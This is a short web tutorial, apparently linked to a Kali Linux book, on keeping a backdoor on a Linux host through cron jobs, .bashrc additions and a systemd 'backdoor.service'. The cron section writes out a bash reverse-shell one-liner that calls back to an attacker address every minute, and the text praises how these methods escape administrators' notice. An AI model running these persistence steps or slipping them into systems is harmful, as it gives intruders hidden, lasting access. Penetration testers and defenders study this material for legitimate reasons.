Gaining initial access to a target is one thing, but maintaining that access is another. If you want to ensure your foothold survives a reboot or a user logging out, you need to learn how to establish persistence on a Linux system. Persistence is a key goal in advanced offensive operations, and there are many ways to achieve it. This tutorial will cover three common user-mode techniques to create a durable backdoor on a target machine.
Table of Contents
🕰️ How to Use Cron Jobs for Scheduled Access
One of the oldest and most reliable persistence mechanisms on Linux is the cron job. The cron daemon is a system utility that runs commands on a schedule. You can add an entry to a user’s crontab that executes your payload periodically. For example, you could add a line like `* * * * * /bin/bash -c ‘bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1’` to the crontab. This command attempts to launch a reverse shell back to your machine every single minute, ensuring that even if the connection drops, it will be re-established shortly.
셸 How to Modify Shell Startup Files
Another classic technique is to hide your payload command within shell startup files like `.bashrc` or `.profile`. These files are executed every time a user opens a new shell or logs in. By appending your reverse shell one-liner to the end of a user’s `.bashrc` file, your payload will be executed whenever that user opens a terminal. This is a very effective method, as it blends in with legitimate user activity and is often overlooked by system administrators.
⚙️ How to Create a systemd Service for a Persistent Backdoor
For more robust and modern persistence, you can create a custom systemd service. systemd is the standard init system for most major Linux distributions. You can create a service unit file (e.g., `/etc/systemd/system/backdoor.service`) that defines how your payload should be run. You can configure it to start on boot and to automatically restart if it ever fails. After creating the service file, you just need to enable it with `systemctl enable backdoor.service`. This method is very powerful as it’s managed by the OS itself, making it highly resilient and stealthy.
—
Johnson, Richard. Kali Linux Essentials. NOBTREX LLC, 2025.
More Topics
- How to Get Started Auditing Kubernetes Security with Kali
- How to Use Kali Linux Legally and Ethically: A Guide for Pentesters
- How to Manage Sudo Privileges in Kali for Better Team Security
- How to Create a Rogue Access Point in Kali for Security Audits
- How to Perform a Live Forensic Disk Image Acquisition with Kali
- How to Evade Basic AV with Payload Obfuscation
- How to Use Kali for Defensive Validation (Blue Team Integration)
